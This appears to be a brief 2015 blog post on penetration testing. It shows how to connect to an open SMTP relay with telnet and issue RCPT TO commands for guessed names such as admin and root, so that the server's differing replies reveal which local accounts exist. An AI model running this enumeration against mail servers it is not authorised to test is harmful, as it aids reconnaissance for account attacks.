Thursday, December 24, 2015

how to brute force local users using telnet on open SMTP relays


Sometimes doing a penetration test there is a open SMTP relay.
This can be used to brute force local users.

telnet <smtp-server> <port>

smtp> HELO test
smtp> MAIL FROM: bughunter@x1622.com
smtp> RCPT TO: admin@localhost
smtp> RCPT TO: root@localhost 
smtp> RCPT TO: test@localhost 
smtp> RCPT TO: local@localhost 
...

You will receive different responses if user exists or not.